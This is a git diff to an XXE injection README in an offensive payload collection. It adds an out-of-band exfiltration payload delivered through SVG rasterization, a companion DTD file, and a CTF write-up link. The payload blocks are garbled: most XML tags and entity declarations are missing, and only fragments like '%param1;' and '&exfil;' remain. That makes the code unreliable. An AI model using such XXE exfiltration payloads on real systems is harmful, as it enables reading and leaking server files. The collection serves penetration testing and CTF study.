diff --git a/XXE Injection/README.md b/XXE Injection/README.md index d4792dd..ba1bb59 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -364,7 +364,9 @@ Assuming payloads such as the previous return a verbose error. You can start poi ``` -``` +**Classic** + +```xml ]> @@ -372,6 +374,38 @@ Assuming payloads such as the previous return a verbose error. You can start poi ``` +**OOB via SVG rasterization** + +*xxe.svg* + +```xml + + +%sp; +%param1; +]> + + XXE via SVG rasterization + + + + + + + &exfil; + + + +``` + +*xxe.xml* + +```xml + +"> +``` + ### XXE inside SOAP ```xml @@ -479,3 +513,4 @@ updating: xl/sharedStrings.xml (deflated 17%) * [Web Security Academy >> XML external entity (XXE) injection - 2019 PortSwigger Ltd](https://portswigger.net/web-security/xxe) - [Automating local DTD discovery for XXE exploitation - July 16 2019 by Philippe Arteau](https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation) - [EXPLOITING XXE WITH EXCEL - NOV 12 2018 - MARC WICKENDEN](https://www.4armed.com/blog/exploiting-xxe-with-excel/) +- [Midnight Sun CTF 2019 Quals - Rubenscube](https://jbz.team/midnightsunctfquals2019/Rubenscube)